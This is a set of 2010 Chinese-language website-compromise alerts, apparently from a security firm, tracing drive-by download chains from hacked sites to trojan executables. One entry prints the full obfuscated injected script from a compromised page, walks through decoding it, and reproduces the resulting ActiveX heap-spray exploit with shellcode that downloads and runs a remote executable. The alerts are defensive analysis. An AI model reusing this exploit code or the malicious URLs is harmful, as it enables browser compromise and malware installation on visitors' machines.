知道创宇

发 布 时 间 ：Thu Mar 11 21:26:12 2010
最后更新时间：Thu Mar 11 21:26:12 2010
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 柏美亚（中国）有限公司（http://permea.com.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://permea.com.cn/

挂马分析：
[root]http://permea.com.cn/(柏美亚（中国）有限公司)
…[script]http://hcl.xorg.pl/c.js?google_ad=12×308_ad
……[iframe]http://afd.bij.pl/44/957sd.htm
………[flash]http://afd.bij.pl/44/iie.swf
………[flash]http://afd.bij.pl/44/fff.swf
………[iframe]http://afd.bij.pl/44/av.htm
…………[exp]http://afd.bij.pl/44/mp.htm(Exploit.Mpeg2.b)
……………[script]http://afd.bij.pl/44/ll0.jpg
……………[script]http://afd.bij.pl/44/ll1.jpg
……………[script]http://afd.bij.pl/44/upp.jpg
………………[virus]http://afd.bij.pl/l/no.exe
……………[script]http://afd.bij.pl/44/llll1.jpg
……………[script]http://afd.bij.pl/44/llll.jpg
……………[script]http://afd.bij.pl/44/lllll.jpg
…………[iframe]http://afd.bij.pl/44/nod.htm
……………[exp]http://afd.bij.pl/44/lz.htm(Exploit.GLWorldHanGamePluginCn18.a)
………………[script]http://afd.bij.pl/44/oopk.jpg
…………………[virus]http://afd.bij.pl/l/no.exe
………………[script]http://afd.bij.pl/44/ll1.jpg
………………[script]http://afd.bij.pl/44/lz.jpg
…………[iframe]http://afd.bij.pl/44/real.htm
……………[exp]http://afd.bij.pl/44/myra.htm(Exploit.RealPlayerIerpplug.b)
………………[script]http://afd.bij.pl/44/myr.jpg
…………………[virus]http://afd.bij.pl/l/no.exe
…………[iframe]http://afd.bij.pl/44/rising.htm
……………[exp]http://afd.bij.pl/44/ofnt.htm(Exploit.OfficeSpreadsheet.a)
………………[script]http://afd.bij.pl/44/oopk.jpg
………………[script]http://afd.bij.pl/44/uug.jpg
………[script]http://afd.bij.pl/44/fa.js
…………[iframe]http://afd.bij.pl/44/fla.htm
……………[iframe]http://afd.bij.pl/44/ff.html
………………[flash]http://afd.bij.pl/44/xp.swf
………………[script]http://afd.bij.pl/44/if.swf
……………[iframe]http://afd.bij.pl/44/ie.html
………………[flash]http://afd.bij.pl/44/xp.swf
………………[script]http://afd.bij.pl/44/if.swf
……………[iframe]http://afd.bij.pl/44/ff.html
……………[iframe]http://afd.bij.pl/44/ie.html
……………[iframe]http://afd.bij.pl/44/ff.html
……………[iframe]http://afd.bij.pl/44/ff.html
………[script]http://afd.bij.pl/44/1.js

最终下载病毒文件：
http://afd.bij.pl/l/no.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 1% [?]

发 布 时 间 ：Tue Mar 09 19:39:20 2010
最后更新时间：Tue Mar 09 19:39:20 2010
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 学海网（http://www.xuehai114.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.xuehai114.com/

挂马分析：
[root]http://www.xuehai114.com/
…[script]http://hmz.xorg.pl/c.js?google_ad=03×081_ad
……[iframe]http://aez.bij.pl/44/951sd.htm
………[flash]http://aez.bij.pl/44/iie.swf
………[flash]http://aez.bij.pl/44/fff.swf
………[iframe]http://aez.bij.pl/44/av.htm
…………[exp]http://aez.bij.pl/44/mp.htm(Exploit.Mpeg2.b)
……………[script]http://aez.bij.pl/44/ll0.jpg
……………[script]http://aez.bij.pl/44/ll1.jpg
……………[script]http://aez.bij.pl/44/upp.jpg
………………[virus]http://aez.bij.pl/l/nm.exe
……………[script]http://aez.bij.pl/44/llll1.jpg
……………[script]http://aez.bij.pl/44/llll.jpg
……………[script]http://aez.bij.pl/44/lllll.jpg
…………[iframe]http://aez.bij.pl/44/nod.htm
……………[exp]http://aez.bij.pl/44/lz.htm(Exploit.GLWorldHanGamePluginCn18.a)
………………[script]http://aez.bij.pl/44/oopk.jpg
…………………[virus]http://aez.bij.pl/l/nm.exe
………………[script]http://aez.bij.pl/44/ll1.jpg
………………[script]http://aez.bij.pl/44/lz.jpg
…………[iframe]http://aez.bij.pl/44/real.htm
……………[exp]http://aez.bij.pl/44/myra.htm(Exploit.RealPlayerIerpplug.b)
………………[script]http://aez.bij.pl/44/myr.jpg
…………………[virus]http://aez.bij.pl/l/nm.exe
…………[iframe]http://aez.bij.pl/44/rising.htm
……………[exp]http://aez.bij.pl/44/ofnt.htm(Exploit.OfficeSpreadsheet.a)
………………[script]http://aez.bij.pl/44/oopk.jpg
………………[script]http://aez.bij.pl/44/uug.jpg
………[script]http://aez.bij.pl/44/fa.js
…………[iframe]http://aez.bij.pl/44/fla.htm
……………[iframe]http://aez.bij.pl/44/ff.html
………………[flash]http://aez.bij.pl/44/xp.swf
………………[script]http://aez.bij.pl/44/if.swf
……………[iframe]http://aez.bij.pl/44/ie.html
………………[flash]http://aez.bij.pl/44/xp.swf
………………[script]http://aez.bij.pl/44/if.swf
……………[iframe]http://aez.bij.pl/44/ff.html
……………[iframe]http://aez.bij.pl/44/ie.html
……………[iframe]http://aez.bij.pl/44/ff.html
……………[iframe]http://aez.bij.pl/44/ff.html
………[script]http://aez.bij.pl/44/1.js

最终下载病毒文件：
http://aez.bij.pl/l/nm.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 2% [?]

现在挂马的真可谓煞费苦心啊。。。
http://www.lifan.com/en/hucom/folder/game.htm的源代码：
<script>
var packcode="zC3z84z45zD4zC4zE3zD0zA0zC3z84z54z14z44zE3zD0zA0zC3zD4z54z45z14z02z86z47z47z07zD2z56z17z57z96z67zD3z34zF6zE6z47z56zE6z47zD2z45z97z07z56z02z36zF6zE6z47z56zE6z47zD3z22z47z56z87z47zF2z86z47zD6zC6zB3z02z36z86z16z27z37z56z47zD3z76z26z23z33z13z23z22zE3zD0zA0zC3zF2z84z54z14z44zE3zD0zA0zC3z24zF4z44z95zE3zD0zA0zC3zF4z24zA4z54z34z45z02z96z46zD3z22z47z16z27z76z56z47z22z02z36zC6z16z37z37z96z46zD3z22z36zC6z37z96z46zA3z73z53z13z03z83z24z23z93zD2z23z03z23z64zD2z43z93z33z34zD2z83z63z34z53zD2z13z34z13z83z23z14z43z83z53z34z43z34z22zE3zC3zF2zF4z24zA4z54z34z45zE3zD0zA0zC3z35z34z25z94z05z45z02zC6z16zE6z76z57z16z76z56zD3z22zA4z16z67z16z35z36z27z96z07z47z22zE3z02zD0zA0z67z16z27z02z87z37z87z66z97zC2z87z37z87z66z97z23zB3zD0zA0z67z16z27z02z87z66z97zD3z22z52z57z22zB3zD0zA0z67z16z27z02z36z27z97z16zD3z87z66z97zB2z22z93z03z93z03z22zB2z87z66z97zB3zD0zA0z67z16z27z02z36z27z97z26zD3z22z93z03z93z03z22zB3zD0zA0z67z16z27z02z87z37z87z66z97z16zD3z22z52z57z93z03z93z03z52z57z93z03z93z03z52z57z53z43z56z26z52z57z73z53z83z26z52z57z83z26z33z36z52z57z33z53z73z43z52z57z03z33z73z83z52z57z53z63z66z53z52z57z73z63z83z26z52z57z03z33z23z03z52z57z33z33z66z53z52z57z43z93z36z93z52z57z16z46z43z13z52z57z46z26z33z33z52z57z03z66z33z63z52z57z13z43z26z56z52z57z33z83z23z83z52z57z73z43z66z23z52z57z36z13z22zB3zD0zA0z87z37z87z66z97zD3z22z03z83z52z57z03z46z36z26z52z57z46z16z03z33z52z57z56z26z43z03z52z57z33z26z56z66z52z57z73z53z46z66z52z57z53z56z56z73z52z57z53z56z83z26z52z57z03z33z23z43z52z57z63z63z46z46z52z57z03z36z83z26z52z57z83z26z43z26z52z57z13z36z53z56z52z57z46z46z03z33z52z57z03z43z83z26z52z57z03z33z83z26z52z57z36z33z36z53z52z57z73z23z73z53z52z57z63z46z63z36z52z57z63z56z63z66z52z57z63z43z23z56z52z57z63z36z63z36z52z57z43z33z03z03z52z57z53z36z33z16z52z57z23z56z53z53z52z57z73z83z63z53z52z57z03z03z63z53z52z57z36z03z33z33z52z57z03z33z63z43z52z57z33z03z43z03z52z57z03z36z73z83z52z57z43z03z83z26z52z57z83z26z03z36z52z57z13z36z73z03z52z57z83z26z16z46z52z57z03z83z43z03z52z57z03z93z56z26z52z57z43z03z83z26z52z57z83z46z33z43z52z57z73z36z43z03z52z57z43z03z83z26z52z57z93z53z33z36z52z57z83z56z26z66z52z57z03z56z43z56z52z57z56z83z56z36z52z57z66z66z83z43z52z57z66z66z66z66z52z57z56z36z83z33z52z57z83z33z03z43z52z57z23z43z23z36z52z57z66z66z33z36z52z57z93z53z46z03z52z57z26z66z53z03z52z57z13z16z33z63z52z57z73z03z23z66z52z57z63z66z56z83z52z57z66z66z66z66z52z57z83z26z66z66z52z57z23z43z53z43z52z57z83z46z66z36z52z57z26z16z53z23z52z57z46z26z33z33z52z57z53z33z53z33z22zB3zD0zA0z87z37z87z66z97z23zD3z22z52z57z56z26z53z23z52z57z53z33z23z43z52z57z46z03z66z66z52z57z26z66z53z46z52z57z66z56z93z83z52z57z03z56z83z16z52z57z53z33z56z83z52z57z66z66z66z66z52z57z83z33z66z66z52z57z03z43z56z36z52z57z23z36z83z33z52z57z63z23z23z43z52z57z46z03z66z66z52z57z73z56z26z66z52z57z56z23z46z83z52z57z56z83z73z33z52z57z66z66z43z03z52z57z66z66z66z66z52z57z66z66z53z23z52z57z56z83z46z03z52z57z66z66z46z73z52z57z66z66z66z66z22zB3zD0zA0z67z16z27z02z87z66z97z46z46zF6z37zD3z22z52z57z73z43z63z83z52z57z73z03z73z43z52z57z23z64z33z14z52z57z33z23z23z64z52z57z33z23z33z23z52z57z33z13z23z54z52z57z33z13z33z73z52z57z33z23z23z54z52z57z23z54z33z63z52z57z23z64z33z53z52z57z73z14z73z14z52z57z63z53z23z54z52z57z63z53z73z83z52z57z03z03z03z03z22zB3zD0zA0z67z16z27z02z87z66z97z87z36zF6z46z56zD3z57zE6z56z37z36z16z07z56z82z87z37z87z66z97z16zB2z87z37z87z66z97zB2z87z37z87z66z97z23zB2z87z66z97z46z46zF6z37z92zB3zD0zA0z67z16z27z02z66z97z96z47z56zD6zD3z03z87z43z03z03z03z03zB3zD0zA0z67z16z27z02z87z66z97z87z87z36zF6z46z56z37z02zD3z02z87z66z97z87z36zF6z46z56zB3zD0zA0z67z16z27z02z26z96z76z26zC6zF6z36zB6z02zD3z02z57zE6z56z37z36z16z07z56z82z36z27z97z16zB2z36z27z97z26z92zB3zD0zA0z67z16z27z02z86z56z16z46z56z27z37z96zA7z56z02zD3z02z23z03zB3zD0zA0z67z16z27z02z37zC6z16z36zB6z37z07z16z36z56z02zD3z02z86z56z16z46z56z27z37z96zA7z56zB2z87z66z97z87z87z36zF6z46z56z37zB5z22zC6z56zE6z76z47z86z22zD5zB3zD0zA0z77z86z96zC6z56z02z82z26z96z76z26zC6zF6z36zB6zB5z22zC6z56zE6z76z22zB2z22z47z86z22zD5zC3z37zC6z16z36zB6z37z07z16z36z56z92zD0zA0z26z96z76z26zC6zF6z36zB6zB2zD3z26z96z76z26zC6zF6z36zB6zB3zD0zA0z66z96zC6zC6z26zC6zF6z36zB6z02zD3z02z26z96z76z26zC6zF6z36zB6zB5z22z37z57z26z37z47z22zB2z22z27z96zE6z76z22zD5z82z03zC2z02z37zC6z16z36zB6z37z07z16z36z56z92zB3zD0zA0z26zC6zF6z36zB6z02zD3z02z26z96z76z26zC6zF6z36zB6zB5z22z37z57z22zB2z22z26z37z47z27z22zB2z22z96zE6z76z22zD5z82z03zC2z02z26z96z76z26zC6zF6z36zB6zE2zC6z56zE6z76z47z86zD2z37zC6z16z36zB6z37z07z16z36z56z92zB3zD0zA0z77z86z96zC6z56z82z26zC6zF6z36zB6zB5z22zC6z56z22zB2z22zE6z76z47z86z22zD5zB2z37zC6z16z36zB6z37z07z16z36z56zC3z66z97z96z47z56zD6z92zD0zA0z26zC6zF6z36zB6z02zD3z02z26zC6zF6z36zB6zB2z26zC6zF6z36zB6zB2z66z96zC6zC6z26zC6zF6z36zB6zB3zD0zA0zD6z56zD6zF6z27z97z02zD3z02zE6z56z77z02z77z96zE6z46zF6z77zB5z22z14z27z27z16z97z22zD5z82z92zB3zD0zA0z66zF6z27z02z82z87zD3z03zB3z02z87zC3z33z03z03zB3z02z87zB2zB2z92zD0zA0zD6z56zD6zF6z27z97zB5z87zD5z02zD3z02z26zC6zF6z36zB6z02zB2z02z87z66z97z87z87z36zF6z46z56z37zB3zD0zA0z67z16z27z02z26z57z66z66z56z27z02zD3z02z72z72zB3zD0zA0z77z86z96zC6z56z02z82z26z57z66z66z56z27zB5z22zC6z56zE6z76z47z86z22zD5z02zC3z02z73z93z63z02z92zD0zA0z26z57z66z66z56z27zB2zD3z57zE6z56z37z36z16z07z56z82z22z52z22zB2z22z57z03z22zB2z22z36z03z36z22z92zB3zD0zA0z47z16z27z76z56z47zE2z34z27z56z16z47z56z34z86z96zE6z16z76z16zD6z56z37z82z26z57z66z66z56z27z92zB3zD0zA0zC3zF2z35z34z25z94z05z45zE3zD0zA0zC3zF2z24zF4z44z95zE3zC3zF2z84z45zD4zC4zE3zD0zA0";
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 1(0){4 5.6(0^3)};',7,7,'m|sb|function||return|String|fromCharCode'.split('|'),0,{}));
eval(sb(101)+sb(118)+sb(109)+sb(96)+sb(119)+sb(106)+sb(108)+sb(109)+sb(35)+sb(113)+sb(102)+sb(115)+sb(111)+sb(98)+sb(96)+sb(102)+sb(112)+sb(119)+sb(113)+sb(43)+sb(112)+sb(119)+sb(113)+sb(42)+sb(120)+sb(14)+sb(9)+sb(117)+sb(98)+sb(113)+sb(35)+sb(98)+sb(113)+sb(113)+sb(49)+sb(62)+sb(109)+sb(102)+sb(116)+sb(35)+sb(66)+sb(113)+sb(113)+sb(98)+sb(122)+sb(43)+sb(42)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(112)+sb(62)+sb(33)+sb(33)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(106)+sb(62)+sb(33)+sb(33)+sb(56)+sb(14)+sb(9)+sb(98)+sb(113)+sb(113)+sb(49)+sb(62)+sb(112)+sb(119)+sb(113)+sb(45)+sb(112)+sb(115)+sb(111)+sb(106)+sb(119)+sb(43)+sb(33)+sb(33)+sb(42)+sb(56)+sb(14)+sb(9)+sb(101)+sb(108)+sb(113)+sb(43)+sb(106)+sb(62)+sb(51)+sb(56)+sb(106)+sb(63)+sb(98)+sb(113)+sb(113)+sb(49)+sb(45)+sb(111)+sb(102)+sb(109)+sb(100)+sb(119)+sb(107)+sb(56)+sb(106)+sb(40)+sb(40)+sb(42)+sb(120)+sb(14)+sb(9)+sb(106)+sb(101)+sb(43)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(62)+sb(33)+sb(44)+sb(33)+sb(42)+sb(120)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(33)+sb(33)+sb(126)+sb(14)+sb(9)+sb(106)+sb(101)+sb(43)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(62)+sb(33)+sb(125)+sb(33)+sb(42)+sb(120)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(33)+sb(33)+sb(126)+sb(14)+sb(9)+sb(106)+sb(101)+sb(43)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(62)+sb(33)+sb(60)+sb(33)+sb(42)+sb(120)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(33)+sb(33)+sb(126)+sb(14)+sb(9)+sb(106)+sb(101)+sb(43)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(62)+sb(33)+sb(67)+sb(33)+sb(42)+sb(120)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(62)+sb(33)+sb(33)+sb(126)+sb(14)+sb(9)+sb(126)+sb(14)+sb(9)+sb(101)+sb(108)+sb(113)+sb(43)+sb(106)+sb(62)+sb(51)+sb(56)+sb(106)+sb(63)+sb(98)+sb(113)+sb(113)+sb(49)+sb(45)+sb(111)+sb(102)+sb(109)+sb(100)+sb(119)+sb(107)+sb(56)+sb(106)+sb(40)+sb(40)+sb(42)+sb(120)+sb(112)+sb(62)+sb(112)+sb(40)+sb(98)+sb(113)+sb(113)+sb(49)+sb(88)+sb(106)+sb(94)+sb(126)+sb(14)+sb(9)+sb(113)+sb(102)+sb(119)+sb(118)+sb(113)+sb(109)+sb(35)+sb(112)+sb(56)+sb(14)+sb(9)+sb(126)+sb(14)+sb(9)+sb(101)+sb(118)+sb(109)+sb(96)+sb(119)+sb(106)+sb(108)+sb(109)+sb(35)+sb(118)+sb(109)+sb(115)+sb(98)+sb(96)+sb(104)+sb(96)+sb(108)+sb(103)+sb(102)+sb(43)+sb(96)+sb(108)+sb(103)+sb(102)+sb(42)+sb(120)+sb(14)+sb(9)+sb(117)+sb(98)+sb(113)+sb(35)+sb(112)+sb(119)+sb(113)+sb(62)+sb(33)+sb(33)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(98)+sb(113)+sb(113)+sb(62)+sb(109)+sb(102)+sb(116)+sb(35)+sb(66)+sb(113)+sb(113)+sb(98)+sb(122)+sb(43)+sb(42)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(112)+sb(50)+sb(62)+sb(33)+sb(33)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(112)+sb(49)+sb(62)+sb(33)+sb(33)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(112)+sb(48)+sb(62)+sb(33)+sb(33)+sb(56)+sb(117)+sb(98)+sb(113)+sb(35)+sb(106)+sb(62)+sb(51)+sb(56)+sb(14)+sb(9)+sb(112)+sb(119)+sb(113)+sb(62)+sb(113)+sb(102)+sb(115)+sb(111)+sb(98)+sb(96)+sb(102)+sb(112)+sb(119)+sb(113)+sb(43)+sb(96)+sb(108)+sb(103)+sb(102)+sb(42)+sb(56)+sb(14)+sb(9)+sb(112)+sb(119)+sb(113)+sb(62)+sb(112)+sb(119)+sb(113)+sb(45)+sb(113)+sb(102)+sb(115)+sb(111)+sb(98)+sb(96)+sb(102)+sb(43)+sb(44)+sb(121)+sb(44)+sb(100)+sb(47)+sb(33)+sb(33)+sb(42)+sb(56)+sb(14)+sb(9)+sb(116)+sb(107)+sb(106)+sb(111)+sb(102)+sb(43)+sb(106)+sb(63)+sb(112)+sb(119)+sb(113)+sb(45)+sb(111)+sb(102)+sb(109)+sb(100)+sb(119)+sb(107)+sb(42)+sb(120)+sb(14)+sb(9)+sb(112)+sb(50)+sb(62)+sb(112)+sb(119)+sb(113)+sb(45)+sb(112)+sb(118)+sb(97)+sb(112)+sb(119)+sb(113)+sb(43)+sb(106)+sb(47)+sb(49)+sb(42)+sb(56)+sb(14)+sb(9)+sb(98)+sb(113)+sb(113)+sb(62)+sb(112)+sb(50)+sb(45)+sb(112)+sb(115)+sb(111)+sb(106)+sb(119)+sb(43)+sb(33)+sb(33)+sb(42)+sb(56)+sb(14)+sb(9)+sb(112)+sb(49)+sb(62)+sb(112)+sb(49)+sb(40)+sb(33)+sb(38)+sb(33)+sb(40)+sb(98)+sb(113)+sb(113)+sb(88)+sb(50)+sb(94)+sb(40)+sb(98)+sb(113)+sb(113)+sb(88)+sb(51)+sb(94)+sb(56)+sb(14)+sb(9)+sb(106)+sb(62)+sb(106)+sb(40)+sb(49)+sb(56)+sb(14)+sb(9)+sb(126)+sb(14)+sb(9)+sb(113)+sb(102)+sb(119)+sb(118)+sb(113)+sb(109)+sb(35)+sb
(112)+sb(49)+sb(56)+sb(14)+sb(9)+sb(126)+sb(14)+sb(9)+sb(101)+sb(118)+sb(109)+sb(96)+sb(119)+sb(106)+sb(108)+sb(109)+sb(35)+sb(110)+sb(98)+sb(106)+sb(109)+sb(43)+sb(42)+sb(120)+sb(14)+sb(9)+sb(103)+sb(108)+sb(96)+sb(118)+sb(110)+sb(102)+sb(109)+sb(119)+sb(45)+sb(116)+sb(113)+sb(106)+sb(119)+sb(102)+sb(43)+sb(118)+sb(109)+sb(102)+sb(112)+sb(96)+sb(98)+sb(115)+sb(102)+sb(43)+sb(118)+sb(109)+sb(115)+sb(98)+sb(96)+sb(104)+sb(96)+sb(108)+sb(103)+sb(102)+sb(43)+sb(115)+sb(98)+sb(96)+sb(104)+sb(96)+sb(108)+sb(103)+sb(102)+sb(42)+sb(42)+sb(42)+sb(56)+sb(14)+sb(9)+sb(113)+sb(102)+sb(119)+sb(118)+sb(113)+sb(109)+sb(35)+sb(119)+sb(113)+sb(118)+sb(102)+sb(56)+sb(14)+sb(9)+sb(126)+sb(14)+sb(9)+sb(110)+sb(98)+sb(106)+sb(109)+sb(43)+sb(42)+sb(56)+'');
</script>

大 体浏览代码，发现中间有一段base62加花的代码：eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2 1(0){4 5.6(0^3)};',7,7,'m|sb|function||return|String|fromCharCode'.split('|'),0,{}));
单 独解密，获得代码：
function sb(m){return String.fromCharCode(m^3)};
sb()函数即下面代码要用到的解密函数，摘出最下面的一段和 刚刚获得的sb()函数，进行解密，获得最终的解密函数：
function replacestr(str){
var arr2=new Array();var s="";var i="";
arr2=str.split("");
for(i=0;i<arr2.length;i++){
if(arr2[i]=="/"){arr2[i]=""}
if(arr2[i]=="~"){arr2[i]=""}
if(arr2[i]=="?"){arr2[i]=""}
if(arr2[i]=="@"){arr2[i]=""}
}
for(i=0;i<arr2.length;i++){s=s+arr2[i]}
return s;
}
function unpackcode(code){
var str="";var arr=new Array();var s1="";var s2="";var s3="";var i=0;
str=replacestr(code);
str=str.replace(/z/g,"");
while(i<str.length){
s1=str.substr(i,2);
arr=s1.split("");
s2=s2+"%"+arr[1]+arr[0];
i=i+2;
}
return s2;
}
function main(){
document.write(unescape(unpackcode(packcode)));
return true;
}
main();
修 改main()函数体为：
function main(){
return (unescape(unpackcode(packcode)));
}
最后的main()改为txt.value=main()
然 后添加脚本标签，开头加入<textarea id=txt></textarea>
及源代码开头的那段字符串，保存文 件，运行，获得代码：
<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
</HEAD>
<BODY>
<OBJECT id="target" classid="clsid:75108B29-202F-493C-86C5-1C182A485C4C"></OBJECT>
<SCRIPT language="JavaScript">
var xsxfy,xsxfy2;
var xfy="%u";
var crya=xfy+"9090"+xfy;
var cryb="9090";
var xsxfya="%u9090%u9090%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2%uc1";
xsxfy="08%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353";
xsxfy2="%ueb52%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40%uffff%uff52%ue8d0%uffd7%uffff";
var xfyddos="%u7468%u7074%u2F3A%u322F%u3232%u312E%u3137%u322E%u2E36%u2F35%u7A7A%u652E%u6578%u0000";
var xfyxcode=unescape(xsxfya+xsxfy+xsxfy2+xfyddos);
var fyitem=0x40000;
var xfyxxcodes = xfyxcode;
var bigblock = unescape(crya+cryb);
var headersize = 20;
var slackspace = headersize+xfyxxcodes["length"];
while (bigblock["leng"+"th"]<slackspace)
bigblock+=bigblock;
fillblock = bigblock["subst"+"ring"](0, slackspace);
block = bigblock["su"+"bstr"+"ing"](0, bigblock.length-slackspace);
while(block["le"+"ngth"]+slackspace<fyitem)
block = block+block+fillblock;
memory = new window["Array"]();
for (x=0; x<300; x++)
memory[x] = block + xfyxxcodes;
var buffer = '';
while (buffer["length"] < 796 )
buffer+=unescape("%"+"u0"+"c0c");
target.CreateChinagames(buffer);
</SCRIPT>
</BODY></HTML>

摘 出%u7468%u7074%u2F3A%u322F%u3232%u312E%u3137%u322E%u2E36%u2F35%u7A7A%u652E%u6578%u0000 进行shellcode解密，获得解密结果： http://222.171.26.5/zz.exe

Popularity: 2% [?]

发 布 时 间 ：Mon Mar 08 20:03:29 2010
最后更新时间：Mon Mar 08 20:03:29 2010
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 力帆集团（http://www.lifan.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:
http://www.lifan.com/en/hucom/folder/9002.htm
http://www.lifan.com/en/hucom/folder/newbf.html
http://www.lifan.com/en/hucom/folder/index.asp
http://www.lifan.com/en/hucom/folder/xp.htm
http://www.lifan.com/en/hucom/folder/rp11.htm
http://www.lifan.com/en/hucom/folder/game.htm

挂马分析：
[root]http://www.lifan.com/en/hucom/folder/game.htm
…[exe]http://222.171.26.5/zz.exe

最终下载病毒文件：
http://222.171.26.5/zz.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 2% [?]

发 布 时 间 ：Sat Mar 06 22:00:45 2010
最后更新时间：Sat Mar 06 22:00:45 2010
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 河北教育网（http://www.hebjy.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.hebjy.com/

挂马分析：
[root]http://www.hebjy.com/(河北教育网)
…[script]http://hnd.xorg.pl/c.js?google_ad=03×051_ad
……[iframe]http://aet.bij.pl/44/945sd.htm
………[iframe]http://aet.bij.pl/44/av.htm
…………[iframe]http://aet.bij.pl/44/mp.htm
……………[script]http://aet.bij.pl/44/ll0.jpg
……………[script]http://aet.bij.pl/44/ll1.jpg
……………[script]http://aet.bij.pl/44/upp.jpg
………………[exe]http://aet.bij.pl/l/nj.exe
……………[script]http://aet.bij.pl/44/llll1.jpg
……………[script]http://aet.bij.pl/44/llll.jpg
……………[script]http://aet.bij.pl/44/lllll.jpg
…………[iframe]http://aet.bij.pl/44/nod.htm
……………[iframe]http://aet.bij.pl/44/lz.htm
………………[script]http://aet.bij.pl/44/oopk.jpg
…………………[exe]http://aet.bij.pl/l/nj.exe
………………[script]http://aet.bij.pl/44/ll1.jpg
………………[script]http://aet.bij.pl/44/lz.jpg
…………[iframe]http://aet.bij.pl/44/real.htm
……………[iframe]http://aet.bij.pl/44/myra.htm
………………[script]http://aet.bij.pl/44/myr.jpg
…………………[exe]http://aet.bij.pl/l/nj.exe
…………[iframe]http://aet.bij.pl/44/rising.htm
……………[iframe]http://aet.bij.pl/44/ofnt.htm
………………[script]http://aet.bij.pl/44/oopk.jpg
………………[script]http://aet.bij.pl/44/uug.jpg
………[script]http://aet.bij.pl/44/fa.js
…………[iframe]http://aet.bij.pl/44/fla.htm
……………[iframe]http://aet.bij.pl/44/ff.html
